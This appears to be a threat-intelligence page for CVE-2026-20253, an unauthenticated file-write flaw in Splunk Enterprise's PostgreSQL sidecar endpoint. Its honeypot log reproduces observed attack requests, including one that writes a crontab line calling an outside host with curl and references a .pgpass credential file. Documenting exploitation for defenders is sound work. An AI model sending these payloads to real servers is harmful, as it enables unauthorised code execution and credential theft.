Vulnerability Detail
Enriched intelligence for a single CVE
Critical
CVE-2026-20253
PUBLISHEDUnauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise
Not yet in CISA KEV
- Vendor
- Splunk
- Product
- Splunk Enterprise, Splunk Cloud Platform
- Published
- Jun 10, 2026
- EPSS
- 0.1% · 21% pctl
Automate This Intelligence with the Pro API
Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.
Description
In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.
Weaknesses (CWE)
-
Missing Authentication for Critical Function
CVSS Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status
Exploited in the wild
Recorded 2026-06-15 05:15:25 UTC · KEVIntel
Active exploitation observed
Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor
Proof of concept available
Recorded 2026-06-12 10:04:32 UTC · GitHub
Observed Exploitation Attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts Observed
- 55
- Unique Attacker IPs
- 11
- Attacker Countries
- 🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
- Sensors Observed
- 2
Exploitation Attempts Over the Last 30 Days
First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC
Recent Attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
|
2026-06-15 05:16 UTC
about 15 hours ago
|
🇺🇸 45.198.224.26United States Seen 11 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.31.0
|
High |
View Hide
Attacker
45.198.224.26
🇺🇸
United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.31.0
Payload fingerprint
sha256:f46b190bfac2bd8e7900a793287fc02664e22c45674e4827f284dee69388a930
Payload
{"database": "search_metadata", "backupFile": "test"}
Source
KEVIntel Honeypot
|
|
2026-06-15 05:16 UTC
about 15 hours ago
|
🇫🇷 62.210.127.48Paris, Île-de-France, France Seen 4 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.34.0
|
High |
View Hide
Attacker
62.210.127.48
🇫🇷
Paris, Île-de-France, France
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
python-requests/2.34.0
Payload fingerprint
sha256:d577b52cb0f0baed88dae23a1057fc4d8ddde7a18013ae27ceb5970b60bba745
Payload
{"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass", "_raw": "* * * * * curl http://thi9a5fw.requestrepo.com\n"}
Source
KEVIntel Honeypot
|
|
2026-06-15 05:16 UTC
about 15 hours ago
|
🇺🇸 45.198.224.26United States Seen 11 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
curl/8.5.0
|
High |
View Hide
Attacker
45.198.224.26
🇺🇸
United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
curl/8.5.0
Payload fingerprint
sha256:0d15e0d69981a532a4817417a639cb6c2f5625b083a38c035243838749007ee6
Payload
{ database\:\search_metadata\,\backupFile\:\test\}
Source
KEVIntel Honeypot
|
|
2026-06-15 05:15 UTC
about 15 hours ago
|
🇺🇸 45.198.224.26United States Seen 11 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
curl/8.5.0
|
High |
View Hide
Attacker
45.198.224.26
🇺🇸
United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
curl/8.5.0
Payload fingerprint
sha256:acc736d13c18bc5d84377f3a89fca3758c68f8789cb41863c112573c2e084b38
Payload
{\database\:\hostaddr=45.198.224.26 dbname=pwn\,\backupFile\:\/tmp/poc\}
Source
KEVIntel Honeypot
|
|
2026-06-15 05:15 UTC
about 15 hours ago
|
🇺🇸 45.198.224.26United States Seen 11 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
curl/8.5.0
|
High |
View Hide
Attacker
45.198.224.26
🇺🇸
United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
curl/8.5.0
Payload fingerprint
sha256:150bf2cee9904dd1f9f5eaae3637ac985a8d3073249c660a2763b71835df038f
Payload
{ database\:\search_metadata\,\backupFile\:\test\}
Source
KEVIntel Honeypot
|
Known Exploited Vulnerability Sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-15 05:15 UTC |
Scanner Integrations
| Scanner | Reference | Detected |
|---|---|---|
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20253.yaml | Jun 15, 2026 |
Recent Mentions
TheHackerNews · Jun 13, 2026
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
Watchtower Labs · Jun 12, 2026
Three posts? In three days? Are we insane?We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory:It has everything that we
Potential Proof of Concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2026-06-12 10:04:32 UTC · 2 stars
nuclei · Created Unknown
Timeline
-
Added to KEVIntel
-
Detected by Nuclei
-
Proof of Concept Exploit Available
-
CVE Published to Public
-
CVE ID Reserved